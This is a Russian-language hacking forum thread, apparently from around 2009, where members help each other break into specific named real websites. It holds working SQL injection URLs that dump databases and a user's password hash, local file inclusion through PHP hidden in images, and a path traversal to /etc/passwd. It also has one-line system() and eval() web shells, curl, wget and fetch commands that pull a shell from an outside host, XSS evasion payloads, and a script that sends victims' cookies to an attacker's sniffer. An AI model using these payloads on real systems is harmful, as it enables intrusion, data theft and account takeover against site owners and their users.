А по поводу аватарки. Я попробовал на локалке и что то не прокатило у меня. Правильно ли я делаю? Открыл в WinHex картинку, и дописал вконце ради теста <script>alert('test')</script>. Пробовал еще вводить <?phpinfo()?>. Но когда открыл в браузере никакого результата.
Подскажите пожалуйста где ошибка.

не <?phpinfo()?>, а <?php phpinfo(); ?>

files/get/-114+union+select+1,2,3,4,5,6,7,8,9--/

R1dex, ух спс. Просто я дошел до 4 полей и не стал дальше расскручивать, потому что ошибки никакой не было... Удали пост, не хочу чтобы индексовался сайт...

не <?phpinfo()?>, а <?php phpinfo(); ?>
а разве есть разница? =)

-----------------------------------------------------------------------------------------------------------------
1. <?php echo("если вы хотите работать с документами XHTML или XML, делайте так\n"); ?>

2. <? echo ("это простейшая инструкция обработки SGML\n"); ?>
<?= выражение ?> Это синоним для "<? echo выражение ?>"

--------------------------------------------------------------------------------------------------------------

Первый способ, <?php. . .?>, наиболее предпочтительный, так как он позволяет использовать PHP в коде, соответствующем правилам XML, таком как XHTML.

Второй способ не всегда доступен. Короткие теги доступны только когда они включены. Это можно сделать, используя функцию short_tags() (только в PHP 3), включив установку short_open_tag в конфигурационном файле PHP, либо скомпилировав PHP с параметром --enable-short-tags для configure. Даже если оно включено по умолчанию в php.ini-dist, использование коротких тегов не рекомендуется.


http://php.ru/manual/language.basic-syntax.html

Да я и так и так пробовал, я даже пробовал <?php echo "Test" ?> выводить, не получается в картинку закинуть. Правильно делаю что в конец файла ввожу код?
Кто нибудь знает что на сервере должно быть чтобы это ошибка работала? Какие то опции, права может.

Но когда открыл в браузере никакого результата.
Вот это как-бэ настораживает. :)
Что значит "открыл в браузере" ? Это будет работать не при прямом обращении к файлу, а при инклуде. Надеюсь ты так и делаешь?

Вот это как-бэ настораживает. :)
Что значит "открыл в браузере" ? Это будет работать не при прямом обращении к файлу, а при инклуде. Надеюсь ты так и делаешь?

:D Нет)) я просто тестово на локалке прописал картинку, открываю ее путь и нифига, картинка цела и невредима :(
Если не трудно, поподробнее объясните как оно проворачивается?

:D Нет)) я просто тестово на локалке прописал картинку, открываю ее путь и нифига, картинка цела и невредима :(
Если не трудно, поподробнее объясните как оно проворачивается?
Мде :)
Если просто для теста, создай файл например такой
include.php
<?
$a=$_GET['a'];
include "$a";
?>
И обращайся к нему
http://localhost/test/include/include.php?a=твоя/картинка/1.bmp

А картинку (1.bmp) уже редактируй

Спасибо) Будем попробовать.

Всем здасьте объясните каким способом можно залить шелл на сайт где установлен двиг DLE

Возможно ли в php-инъекции как-нибудь вывести содержимое директории, а не файла?

2 InFlame
неа

Привет. Я опять же с этим сайтом. Здесь нашел что в табле юзерс есть поле логин.
http://psp-club.ru/files/get/-114+union+select+COLUMN_NAME,2,3,4,5,6,7,8,9+FROM+ INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='USERS '+limit+10,1--/

Но когда пытаюсь вывести http://psp-club.ru/files/get/-114+union+select+login,2,3,4,5,6,7,8,9+FROM+users+ limit+1,1/
Ничего не выводит. Жду помощи, и конечно спасибо выражу +5.

Там несколько таблиц users. (4+)

http://psp-club.ru/files/get/-114+union+select+passwd,2,3,4,5,6,7,8,9+FROM+exim. users/*

http://psp-club.ru/files/get/-114+union+select+login,2,3,4,5,6,7,8,9+FROM+fake_g aming.users/*

Первый логин может быть пустой, либо в таблице вообше записей нет.

Люди,что хранится в .cpan/.lock ?

Открыл,а там название сайта и вверху какие-то цифферки...проясните а(


Ещё проблема: Скачал словарь с этого форума в .тхт формате,подрубаю в PasswordsPro,предварительно закинув его в папку Dictionaries.Затем проставил Атака по Словарям.Запустил,а мне выдало,что простая атака по словарям закончена:((

http://www.kstu.ru/event.jsp?id=8845+union+select+null,null,null,null ,null,null+from+sys.dual--
помогите пожалуиста разобраться, какой тип данных в третьем поле? или на какой его изменить?
пробывал to_char() to_number() итд ничего не подходит =,( простите за мою глупость, просто в первый раз встречаюсь с иньекцией в оракле

Там несколько таблиц users. (4+)

http://psp-club.ru/files/get/-114+union+select+passwd,2,3,4,5,6,7,8,9+FROM+exim. users/*

http://psp-club.ru/files/get/-114+union+select+login,2,3,4,5,6,7,8,9+FROM+fake_g aming.users/*
А можно полный список баз и метод доставания всех баз? Лимит не катит...

mailbrush имя бд, где находиться нужная таблица можешь узнать так:
union+select+table_schema+from+information_schema. columns+where+table_name='users'
p.s. но лучше имя таблицы набирай в хэксе без кавычек, т.к. они могут фильтроваться, например table_name=0x7573657273

А можно полный список баз и метод доставания всех баз? Лимит не катит...
Отлично работает лимит. Прочти это:

https://forum.antichat.ru/thread104591.html

Или любой мануал по синтаксису

pinky007, thx! Ковычки не режет. Есть путь к корню полный, но шелл почему-то не льёт. Путь /home/vmail/domains/psp-club.ru/. Кто поможет - скиньте плиз в личку... Вам же этого сайта не надо, а мне очень нужно...

mailbrush там file_priv-n
Я же дал линк на тему, там всё это описывается, неужели нет времени на чтение

пиши так:
<ionmousemove=alert()>OVER

оно само разделит)

А теперь мой вопрос.

Ошибка типа:
[08-Feb-2009 18:12:09] ХХХ User Error : Application Assert Failure. [assert_failure] Unknown page type (hackas) encountered. in c:\Inetpub\wwwroot\site\info.php on line 47
in c:\Inetpub\wwwroot\site\info.php at line 47

запрос был вида:
info.php?е=hack%00as
вобщем нульбайт фильтруется

Или кста те ещё так подойдёт:

<bstyle="background:url(javascript:alert()); ">хек
разделится как:
<b style="background:url(javascript:alert()); ">хек

или атк:

<bstyle=background:url(javascript:alert())>xek

скажите пожалуйста,это скуль? если да,то как вывести инфу?
http://trud.dp.ua/vacancysearch.php?&short_view=1&pagenumber=http://wwwwwwww/&age=1&salary=1&branch=1&area=1&sex=1&education=1&days=1
паук написал что это реальный путь к серверу

http://trud.dp.ua/vacancyview.php?pagenumber=10&branch=-1'&area=


Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /var/www/trudv2eq/trud-v2.dp.ua/vacancyview.php on line 24

вот.....

скажите пожалуйста,это скуль? если да,то как вывести инфу?
http://trud.dp.ua/vacancysearch.php?&short_view=1&pagenumber=http://wwwwwwww/&age=1&salary=1&branch=1&area=1&sex=1&education=1&days=1
паук написал что это реальный путь к серверу

там нет выводимых полей, хотя инфу из бд вполне реально вывести подзапросами, тем более там пятая версия MySQL и там доступно information_schema

http://trud.dp.ua/vacancyview.php?pagenumber=2&branch=2+and+substring(version(),1,1)=5&area=1

вот - там пять таблиц с именем %user%
http://trud.dp.ua/vacancyview.php?pagenumber=2&branch=2+and+ascii(substring((SELECT+table_name+fr om+information_schema.tables+where+table_name+like +char(37,117,115,101,114,37)+limit+5,1),1,1))=117&area=1

там нет выводимых полей, хотя инфу из бд вполне реально вывести подзапросами, тем более там пятая версия MySQL и там доступно information_schema
Если не уверен, зачем вводить людей в заблуждение?

http://trud.dp.ua/vacancyview.php?pagenumber=1&branch=-2+union+select+1,concat_ws(0x3a,User(),Database(), Version()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18/*

вот - там пять таблиц с именем %user%
http://trud.dp.ua/vacancyview.php?pagenumber=2&branch=2+and+ascii(substring((SELECT+table_name+fr om+information_schema.tables+where+table_name+like +char(37,117,115,101,114,37)+limit+5,1),1,1))=117&area=1
Завязывай писать ахинею.

Если уж используешь подзапросы, то подумай, что ты вывел таким образом.

Таблиц с именем %user% там 15, если уж быть точным

http://trud.dp.ua/vacancyview.php?pagenumber=1&branch=-2+union+select+1,group_concat(concat_ws(0x3a,table _schema,table_name)),3,4,5,6,7,8,9,0,11,12,13,14,1 5,16,17,18+from+information_schema.tables+where+ta ble_name+LIKE+char(37,117,115,101,114,37)/*

information_schema:USER_PRIVILEGES
cacti:user_auth
cacti:user_auth_perms
cacti:user_auth_realm
cacti:user_log,mysql:user
printmedia:adm_users
trainings:adm_users
trainings:cron_user
trn:adm_users
trn:cron_user
truddp:adm_users
work-xeon:admin_user
work-xeon:cron_user
work-xeon:trud_reason_for_blocking_user
work-xeon:trud_user

http://vipzone.ws//engine/ajax/vote.php?vote_action=results&vote_skin=../../../../../../../../../../../etc/passwd%00

а что дальше???

а что дальше???
Дальше ничего, ты там видешь содержимое passwd? Нет там этой уязвимости.

Дальше ничего, ты там видешь содержимое passwd? Нет там этой уязвимости.
Может поможет кто??

Если не уверен, зачем вводить людей в заблуждение?

http://trud.dp.ua/vacancyview.php?pagenumber=1&branch=-2+union+select+1,concat_ws(0x3a,User(),Database(), Version()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18/*


Завязывай писать ахинею.

Если уж используешь подзапросы, то подумай, что ты вывел таким образом.

Таблиц с именем %user% там 15, если уж быть точным

http://trud.dp.ua/vacancyview.php?pagenumber=1&branch=-2+union+select+1,group_concat(concat_ws(0x3a,table _schema,table_name)),3,4,5,6,7,8,9,0,11,12,13,14,1 5,16,17,18+from+information_schema.tables+where+ta ble_name+LIKE+char(37,117,115,101,114,37)/*

information_schema:USER_PRIVILEGES
cacti:user_auth
cacti:user_auth_perms
cacti:user_auth_realm
cacti:user_log,mysql:user
printmedia:adm_users
trainings:adm_users
trainings:cron_user
trn:adm_users
trn:cron_user
truddp:adm_users
work-xeon:admin_user
work-xeon:cron_user
work-xeon:trud_reason_for_blocking_user
work-xeon:trud_user

скажите пожалуйста,почему вывода нет?

Где вывода нет? Пробелы убери.

Наверное не по теме,но не знаю куда обратится.
Помогите плиз розшифровать хэш..
Rag 50:87e19ab4b5f9c1df9c8fd703361ca4c2
user:f2bf096b5155b3848c02621e29e626e2

http://www.carsec.ee/index.php?show=tooted&lang=est&id=7

Не клеится чет,но union+Select пускает).Остальное ничего не работает.

http://www.carsec.ee/index.php?show=tooted&lang=est&id=7

Не клеится чет,но union+Select пускает).Остальное ничего не работает.
а где там скуль? 0)

Наверное не по теме,но не знаю куда обратится.
Помогите плиз розшифровать хэш..
Rag 50:87e19ab4b5f9c1df9c8fd703361ca4c2
user:f2bf096b5155b3848c02621e29e626e2
Для этих целей есть спец тема - http://forum.antichat.ru/threadedpost1109473.html

а что за хрень? количество столбцов подобрал,но вывода нет, а в низу страницы The used SELECT statements have a different number of columns
не пойму...подобрал же.
http://www.org-tech.ru/view.php?id=-5099&cat=1%20union%20select%201,2,3,4%20--

http://www.org-tech.ru/view.php?id=50990+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45&cat=1

ну вот ребят, есть метод чтобы залить шелл через битбукет без инклуда... ну вот и способ:

простой r57 переименовать в такое название:

myshell.php._gif :) этого файла будет читать как пхп файл

в многих случиаях надо открыть шелл и прописать в начяле GIF89a для того чтобы bitbucket определил его как фотку .gif

есть пару вапросов:

1) вот я залил один файл в каторым ноходица

<? system($_GET[c]) ?>


я пробавал залить шелл через этот варянт таким путём:


curl --output /papka/na/servere/shell.php http://site.com/shell.php
wget -o /papka/na/servere/shell.php http://site.com/shell.php
get http://site.com/shell.php > /papka/na/servere/shell.php
links -source "http://site.com/shell.php" > /papka/na/servere/shell.php
lynx -source http://site.com/shell.php > /papka/na/servere/shell.php
fetch -o /papka/na/servere/shell.php http://site.com/shell.php


но не залился... :( может есть какие нибудь команды чтобы ишё как нибудь залить шелл? или проста скачять все файлы каторые есть в DOCUMENT_ROOT ???

2) я нашол одну дыру в одном сайте, пасматрел в моём кампе у меня есть такой же файл... ну вот и сам файл:


$requestid = $_GET["requestid"];
$res = mysql_query("SELECT userid, filledby FROM requests WHERE id =$requestid") or sqlerr();
$arr = mysql_fetch_assoc($res);
if (($CURUSER[id] == $arr[userid]) || (get_user_class() >= 4) || ($CURUSER[id] == $arr[filledby]))
{
@mysql_query("UPDATE requests SET filled='', filledby=0 WHERE id =$requestid") or sqlerr();
print("Request $requestid successfully reset.");
}
else
print("Sorry, cannot reset a request when you are not the owner");


делаю запрос на том сайте:

reqreset.php?requestid=-1'+union+select+passhash+from+users+--+


передомной ошибка в sql:

SQL Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' passhash from users --' at line 1


помойму тамо сидит фильтр на кавачикй...

так как не нашел инфу по поводу моего вопроса , решил обратится к вам

http://www.cmediere.ro/index.php?mid=3&smid=-16'
Interbase...

помогите составить запрос, либо направте по ссылке на нужную информацию.
Сильно не пинать, так как не часто прошу помощи. спасибо

downloader,
1. это nix? which wget GET curl lynx ? попробуй через аплоад:
<form enctype=multipart/form-data method=post><input type=file name=x><input type=submit></form><?$f=$_FILES[x];copy($f[tmp_name],$f[name]);?>
2. ковычка там не нужна и колонки в запросе две

Gorev, обе переменные участвуют в нескольких запросах поэтому связка с union там врятли прокатит, вообще говоря, т.к. колонка в одном из запросов одна выглядело бы примерно так -1+union+select+cast(user+as+char(n))+from+rdb$user _privileges/* причем тип данных (as char/int/etc(n)) должен совпадать с изначальным в первой выборке, если посимвольным брутом надо покапаться в мануалах найти функцию которая работает с выражениями/строками, особо не вдавался в этот вопрос
/add посмотрел пока писал сообщение посимвольно будет выглядеть примерно так:
+and+substring((select+rdb$user+from+rdb$user_priv ileges+здесь_какой_нибудь_подд ерживаемый_лимит(например rows))+from+1+for+0)='a'/*
все с точностью прочитанного нескольками минутами назад мануала, надо бы поставить, посмотреть может наврал где-то ;)

Gorev, ну и ещё - тебе надо умудриться не только подобрать количество колонок в union, но и их типы) ибо из мануала
<...>Firebird is very strict with datatypes, and when you have different datatype in queries that make up the UNION it throws an error. It can happen even if difference is something trivial like CHAR(5) vs CHAR(6). It also happens for decimal and double datatypes, and (one of the most annoying) when you put NULL or zero.
Firebird 2 has much better type coercion as it detects the largest datatype, and allows smaller ones to fit automatically, i.e. if you have CHAR(5) in one query and CHAR(6) in other, it will automatically set view's column to be CHAR(6). Please note that datatypes have to be compatible for this to work (for example, you cannot union a Blob and Decimal column).

http://www.np-ats.ru/index.jsp?pid=612'+order+by+1--

Такая же хня,скуля там есть.

downloader,
1. это nix? which wget GET curl lynx ? попробуй через аплоад:

<form enctype=multipart/form-data method=post><input type=file name=x><input type=submit></form><?$f=$_FILES[x];copy($f[tmp_name],$f[name]);?>



freeBSD 6.2

sorry но не понял как делать через аплоад :( я ещё навичок в этом деле :)

http://dl.kimep.kz/course/view.php?id=-114
Не могу найти скулю, помогите плз...

Включена фильтрация кавычек, вряд скули там будут.

Включена фильтрация кавычек, вряд скули там будут.
что можешь посоветовать?

искать уязвимости. что ещё советовать-то?) Инъекции в ом параметре нет

где тут вывод???
http://eromarket.com.ua/index.php?productID=-99999%20union%20select%20version()/*

Забавная у тебя там инъекция, без минуса если:


http://eromarket.com.ua/index.php?productID=99999



Извините, запрашиваемый документ не был найден на сервере



http://eromarket.com.ua/index.php?categoryID=15+and+substring(version(),1, 1)=5


5 ветка, похоже слепая, принтабельных колонок или в исходниках ничего не увидел

ан нет, именно в исходниках вывод и есть

5.0.45-log


http://eromarket.com.ua/index.php?categoryID=15+union+select+version()/*



<meta name="Description" content="Секс-шоп - EROmarket - Интернет-магазин, секс, sex, sex-shop, sexshop, интим,секс шоп, нижнее белье, эротические, эротические, белье, магазины, товары, духи, эро, bdsm, ero, эротика, возбудитель Разное Tongue Tingler Vibro E-Z Rider 5.0.45-log, Ukraine, Украина, Kiev, Киев">


80 таблиц. Успехов. File_priv нету

http://www.administrator.net.ru/?id=4-1 = http://www.administrator.net.ru/?id=3

соответственно должна быть скуля?
при 7 колонках пустая пага....есть ли тут скуля? и как ее крутить?
http://www.administrator.net.ru/?id=-4+union+select+1,2,3,4,5,6,7--

2 svesve

http://www.administrator.net.ru/?id=3[sql] blind sql

version : 5.0.37-community
database : administratornet_test
user : netadmin@localhost


есть таблица admin....

Подставил кавычку в поиске sql injection и выдало:

Fatal error: Cannot use object of type DB_Error as array in /home/domen/public_html/lus/script_php/send_msg.php on line 234

Что это за БД и где почитать про раскрутку иньекций в ней?

2 svesve

http://www.administrator.net.ru/?id=3[sql] blind sql

version : 5.0.37-community
database : administratornet_test
user : netadmin@localhost


есть таблица admin....

как искал таблицы?
понимаю что скриптом...за верный ответ сервера ты что принимал?

Sipt

select+table_name+from+information_schema.tables+l imit+{N1-100},1
select+column_name+from+information_schema.columns +where+table_name=(таблица или sql хекc)+limit+{N1-100},1

http://ip-st.ru/txt.php?cat=-1%20union%20select%201,2,3,4,user,6,7,8,9%20from%2 0mysql.user--
Вот открыт mysql.user можно ли залить шелл и что нибудь на подобии, объясните пожалуйста, не разу не заливал охота научиться

Sipt

select+table_name+from+information_schema.tables+l imit+{N1-100},1
select+column_name+from+information_schema.columns +where+table_name=(таблица или sql хекc)+limit+{N1-100},1
так и не разобрался с лимитом

2 Assembler

http://forum.antichat.ru/thread104591.html

2 Svesve юзай прогу от SQLHACK-a Сипт4 там есть посимвольный брут..там запрос и ставь...

http://www.np-ats.ru/index.jsp?pid=612'+order+by+1--

Неужели никто ничего не нашёл ?

Подставил кавычку в поиске sql injection и выдало:

Fatal error: Cannot use object of type DB_Error as array in /home/domen/public_html/lus/script_php/send_msg.php on line 234

Что это за БД и где почитать про раскрутку иньекций в ней?

2 $p01nt link please

Подскажите плиз,
Веб сервер расположен на сервере А
Мускул на сервере Б
то
если - выполнить скул запрос просмотра файла на сервере А -
будет выведен файл сервера А или Б ?
Заранее спасибо

думаю что с сервера А

Я тоже так думал... пока не столкнулся с тем что создавая файлы на сервере через вебшел залитый через мускул не вижу на веб сервере))) Вот и возник вопрос - а не лохонулся ли я)))

Подставил кавычку в поиске sql injection и выдало:

Fatal error: Cannot use object of type DB_Error as array in /home/domen/public_html/lus/script_php/send_msg.php on line 234

Что это за БД и где почитать про раскрутку иньекций в ней?

А хрен его знает.Скорее,mysql.Операторы-то на что?))Или ничего не работает ?

Подскажите плиз,
Веб сервер расположен на сервере А
Мускул на сервере Б
то
если - выполнить скул запрос просмотра файла на сервере А -
будет выведен файл сервера А или Б ?
Заранее спасибо
естественно с сервера на котором висит MySQL!

2 geezer.code хорошо пусть я буду не прав, тогда обьясните мне как мускул прочитает файл с сервера Б на котором находится если файл физически находится на сервере А?

2 geezer.code хорошо пусть я буду не прав, тогда обьясните мне как мускул прочитает файл с сервера Б на котором находится если файл физически находится на сервере А?
никак. а какой именно файл?(может он есть и на сервере Б тоже?).
мускул может работать в контексте конкретной ОС, и читать файлы вы можете только в контексте той ОС где висит мускул.

может он есть и на сервере Б тоже?).
.
Так и есть. :)

В таком случае еще такой вопрос, может кто то уже пробовал такой прикол:
На веб сервере картинки берутся из мускула.
Если вставить в мускул вместо картинки код вебшела - то на вебсервере выполнится пхп код? Правда картинка вставляется в BLOB , не заругается ли мускул если туда пхп код вставить?

У меня такая проблема...
Вобщем есть xss, все делаю правильно... Но мне приходят куки того хостинга на котором лежит мой сниффер. Если на народе страница с редиректом на сниффер, то приходят куки народа... Xss пасивная. Кто знает что может быть?
А если свой сниффер размещю на своем хостинге, то куки приходят тоже моего хостинга =\

Сайт построен на АЯКС. Нашёл КСС-ку. Но когда пытаюсь отправить данные на сервер методом ПОСТ, то вылетает ошибка:
Ошибка синтаксического анализа XML: ошибка синтаксиса
Адрес: http://hacsite.ru/12.php
Строка 1, символ 1:ok
^

что это может быть?

mozarat, покажи свой запрос, что ты составляешь

Сайт построен на АЯКС. Нашёл КСС-ку. Но когда пытаюсь отправить данные на сервер методом ПОСТ, то вылетает ошибка:


что это может быть?

mozarat, покажи свой запрос, что ты составляешь

Это ответ сервера такой, или ИЕ не может распарсить полученый XML ? (Проверь сниффером)

Это ошибка браузера (там была мозилки). Вот как она выглядит в Опере:

Ошибка!
Ошибка разбора XML

Ошибка разбора XML: синтаксическая ошибка (Строка: 1, Символ: 0)

Обработать документ как HTML
Ошибка:unexpected text (non-whitespace text outside root element)
Описание:http://www.w3.org/TR/REC-xml/
1: ok

А ведь запрос такой-же вроде создаю, с единственной, пожалуй разницей - реферрер не тот.

Вобщем задача - избежать ошибки, чтобы ксс выполнялась корректно

Это ошибка браузера (там была мозилки). Вот как она выглядит в Опере:


А ведь запрос такой-же вроде создаю, с единственной, пожалуй разницей - реферрер не тот.

Вобщем задача - избежать ошибки, чтобы ксс выполнялась корректно
Ну наверно надо втулить коректный xml в ответе что бы небыло ошибко. А вобше аяксом(вернее XMLHttpRequest) ты не отравишь ничего на другой хост ибо политики безопасности не дадут.

так я отправлял пост-запрос на сервер не посредством XMLHttpRequest, а через простую http форму.
Или так оно не примет и о xss можно забыть?

В таком случае еще такой вопрос, может кто то уже пробовал такой прикол:
На веб сервере картинки берутся из мускула.
Если вставить в мускул вместо картинки код вебшела - то на вебсервере выполнится пхп код? Правда картинка вставляется в BLOB , не заругается ли мускул если туда пхп код вставить?
ПРобовал на локалхосте. код вставить можно, но на сервере он не выполняется :(
Че то я туплю :D

У меня такая проблема...
Вобщем есть xss, все делаю правильно... Но мне приходят куки того хостинга на котором лежит мой сниффер. Если на народе страница с редиректом на сниффер, то приходят куки народа... Xss пасивная. Кто знает что может быть?
А если свой сниффер размещю на своем хостинге, то куки приходят тоже моего хостинга =\


Если на народе страница с редиректом на сниффер, то приходят куки народа


Вот. И не страница с редиректом, а страница, куда встроен javascript, который производит редирект на снифер + document.cookie

А где размещен снифер (а не ядовитая ссылка на него в виде кода javascript) значения не имеет

http://www.panelmonkey.org/category.php?id=1

Здрасте всем . Што делот , немогу некак понять , если там вопше Sql ?

есть

Помагите , зделот хут кокойто запрос ...

http://www.panelmonkey.org/background.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7--

так я отправлял пост-запрос на сервер не посредством XMLHttpRequest, а через простую http форму.
Или так оно не примет и о xss можно забыть?
А у тебя есть возможность изменить action? Или ты пытаешь автоформу зделать? Ну xss возможна если ты можешь встроить в страницу свой html(js) код посредством изменения каких то параметров передоваемых скрипту(грубо говоря и не вдаваясь в подробности), и если ты отправляешь форму(обычную) post на http://hacsite.ru/12.php то следуя из ошибко видно что у тебя отрпавляеться Content-type: text/xml(ну или xslt) в ответе от http://hacsite.ru/12.php но возрашаемое тело документа далеко не xml.

странно!

-m0rgan-
почемуто по твоему запросу мне показываеть токо вот што : sqldb was unable to successfully run a MySQL query.

И на все тругие тоше самое ..

странно!

-m0rgan-
почемуто по твоему запросу мне показываеть токо вот што : sqldb was unable to successfully run a MySQL query.

И на все тругие тоше самое ..
Убери пробелы из урла и почитай любую статью по скулям

2 Saiga

http://www.panelmonkey.org/background.php?id=-1/**/UNION/**/SELECT/**/1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,email,id, password,username),0x71),0x71),3,4,5,6,7/**/FROM/**/punbb_users/**/LIMIT/**/1,1--

piney@panelmonkey.org:2:8d078be183b8a05eb74256465e 9a507ad5c825f3:TPS Pineapple



работай лимитом и всё у тебя получится

У меня такая проблема...
Вобщем есть xss, все делаю правильно... Но мне приходят куки того хостинга на котором лежит мой сниффер. Если на народе страница с редиректом на сниффер, то приходят куки народа... Xss пасивная. Кто знает что может быть?
А если свой сниффер размещю на своем хостинге, то куки приходят тоже моего хостинга =\

Код присутствующий на странице такой:
<script>img = new Image(); img.src = "http://na-s.ru/images/mozarat_1.gif?"+document.cookie;</script>
Это в .html

Или еще в .js
img = new Image(); img.src = "http://na-s.ru/images/mozarat_1.gif?"+document.cookie;
Xss активная прописывается в сообщении. Сайт выполняет код с заданой ссылки(сайта).
Ставил снииффер на lcoalhoste и сайт (двиг самописаный), и куки приходят нормальные.

Это,люди,вот такой код:

require "./start.php";
require $site_dir."/include/security.php";

if ($HTTP_POST_VARS["editor_mode"] || $HTTP_GET_VARS["editor_mode"] || $HTTP_COOKIE_VARS["editor_mode"] == "editor") {
func_header_location("error_message.php?access_denied&id=3");
}

if (isset($editor_mode))
unset($editor_mode);

x_session_register("editor_mode");

Возможна ли здесь ансет атака,даже если она ничего не даёт :Д

Народ поскажите какой небудь скриптик что бы слить базу под 50K записей.
Проблема в том что чтобы добраться до sql inj надо авторизация на сайте. Без этого к данной sql inj доступа нет. Единственный вариант сливать руками через IE и LIMIT, что никак не хочется :) Извините если попал в offtop

всю базу со всеми колонками? Через скулю? Можно в теории, но слишком долго будет и серв может загнуться, кроме того в логах сервера столько будет гавна)))

есть пару вапросов:

1) вот я залил один файл в каторым ноходица

<? system($_GET[c]) ?>


я пробавал залить шелл через этот варянт таким путём:


curl --output /papka/na/servere/shell.php http://site.com/shell.php
wget -o /papka/na/servere/shell.php http://site.com/shell.php
get http://site.com/shell.php > /papka/na/servere/shell.php
links -source "http://site.com/shell.php" > /papka/na/servere/shell.php
lynx -source http://site.com/shell.php > /papka/na/servere/shell.php
fetch -o /papka/na/servere/shell.php http://site.com/shell.php


но не залился... :( может есть какие нибудь команды чтобы ишё как нибудь залить шелл? или проста скачять все файлы каторые есть в DOCUMENT_ROOT ???

2) я нашол одну дыру в одном сайте, пасматрел в моём кампе у меня есть такой же файл... ну вот и сам файл:


$requestid = $_GET["requestid"];
$res = mysql_query("SELECT userid, filledby FROM requests WHERE id =$requestid") or sqlerr();
$arr = mysql_fetch_assoc($res);
if (($CURUSER[id] == $arr[userid]) || (get_user_class() >= 4) || ($CURUSER[id] == $arr[filledby]))
{
@mysql_query("UPDATE requests SET filled='', filledby=0 WHERE id =$requestid") or sqlerr();
print("Request $requestid successfully reset.");
}
else
print("Sorry, cannot reset a request when you are not the owner");


делаю запрос на том сайте:

reqreset.php?requestid=-1'+union+select+passhash+from+users+--+


передомной ошибка в sql:

SQL Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' passhash from users --' at line 1


помойму тамо сидит фильтр на кавачикй...

Не делай никогда system() - это нерациоанально,
делай eval(). system() не всегда работает и если magic quotes on -то ничего ты не сделаешь....

А eval дает гибкость большую - твой код всегда выполинться даже при magic quotes on (правда с финтами некоторыми =) ) Кроме того, всегда можно сделать и так -если хочешь - eval('system();')


в твоем случае делай так - залий аплоадер простенький - <?php eval($_GET[id]);?> и потом юзай так

site.gov/cmd.php?id=copy('http://xakersite.ru/shell.txt','shell.php');

попугай тама magic_quotes_on :( я бы залил с радастю снова :) но больше нету допуска залить... через system и с magic_quotes_on никак нельзя залить шелл? или может скачать все файлы?

там *nix?
Если да, то почитай конфиги и где то должна быть админка, етс...

напомню:
ls (ls -lia) --листинг диры
pwd ---текущая дира
cat file.php --открыть файл для просмотра (если не катит так, смотри ниже)
cp file.php file.txt ---ну и потом прям в браузере смотрим сорцы
rm file -- удалить файл (например мещающий хтакцесс)

этих команд, в купе с твоим <? system($_GET[c]) ?> , хватит в 90% случаев.

тама FreeBSD

фрибсд это никс система

запрос не правильно составляешь либо прав не хватает

Залил шелл на серв,нашел login pass к БД ,подключился к бд и если чтонить изменяю в бд то изменения не сохраняются,в чем может быть проблема?
mysql?

http://www.mysql.ru/docs/man/mysql_change_user.html

Помогите с сайтом ucoz!
Я заполучил пароль моддера ,можно ли с помошью этого получить пасс админа?

Помогите с сайтом ucoz!
Я заполучил пароль моддера ,можно ли с помошью этого получить пасс админа?
попробуй нагрей админа, он модеру возможно доверяет :D

Возможно у того узера от которого у тебя есть пасс не хватает грантов на изменения даных в той таблицы(базе) в которой ты хочешь внести изменинея.

Помогите с сайтом ucoz!
Я заполучил пароль моддера ,можно ли с помошью этого получить пасс админа?
Блин xss в заголовке новости неробит(

да mysql,непонял чем мне поможет смена пользователя,если я и так знаю логин и пасс к базе.с mysql никогда не работал раньш

мануал не поможет в работе? если ты раньше с мускулем не работал, может ты и запросы не верные составляешь. что ты думаешь по этому поводу?

Вопрос:
Хо4у залезть в phpmyadmin
когда ввожу "http://ip/phpmyadmin" меня перекидывает на "http://google.ru/"
Как в phpmyadmin в таком слу4ае можно попасть?

Што делоть если стоко сталпцоф.... -37+ORDER+BY+100000000000000000000+--

Кидай ссылку, посмотрим.

Плакать)))
А вообще проверь GROUP BY
ЗЫ:Техника в руках не образованого - железо

ht~tp://www.christuniversity.in/secmenudisp.php?MID=-37+GROUP+BY+100000000000000000000+--



а вопше , кому не лен обесните... што нетак зделол ....

www.christuniversity.in/secmenudisp.php?MID=37+group+by+1+--

Один столбец

ой .... не пинайте :)

А почему при простом запросе union+select+1+-- пишеть што : The used SELECT statements have a different number of columns когда я точно узнал што чеголиш 1 столбец

Tepp, на гугл может перекидывать, когда в адресе пробелы, но это наверно не тот случай...

Saiga, значит там не один запрос к базе данных, подбирай дальше через union select
p.s. не заметил, ты неправильно написал, не unin select, а UNION SELECT

видемо мне ....

2 pinky07 незнаю как далше .

Saiga, заканчивай флудить и кидай ссылку.

p.s. терпения не хватило подобрать количество столбцов, в таких случаях можно использовать подзапросы http://www.christuniversity.in/secmenudisp.php?MID=7+and+substring(version(),1,1) =4 версия Mysql =4
юзер бд: http://www.christuniversity.in/secmenudisp.php?MID=7+and+ascii(substring(user(),1 ,1))=99 -- c
итд....

// прочитай побольше статей

hh~tp://www.christuniversity.in/secmenudisp.php?MID=7

http://www.christuniversity.in/secmenudisp.php?MID=7+and+substring(version(),1,1) =4
ИТД...

pinky07, зачем усложнять жизнь подзапросами??? это крайняя мера, так как долго и нудно! Этот сайт вообще одна большая скуль =))) каждый параметр и стоило еще чуть посмотреть и вот он
http://www.christuniversity.in/display_article.php?fid=20&arid=13+UNION+SELECT+1,2,3,concat_ws(0x3a,version( ),user(),database()),5,6,7/*
4.1.22
christco_christ@localhost
christ_university

Всем привет!! Вот нашел чтото непонятное на одном сайте соединенном с базой www.uro.net.ua/ - www.uro.net.ua/phpmyadmin/
Вот ошибка www.uro.net.ua/index.php?act=idx&st=-5 - Раскрутить не удается,вообще нивкакую нехочет!!!

Всем привет!! Вот нашел чтото непонятное на одном сайте соединенном с базой www.uro.net.ua/ - www.uro.net.ua/phpmyadmin/
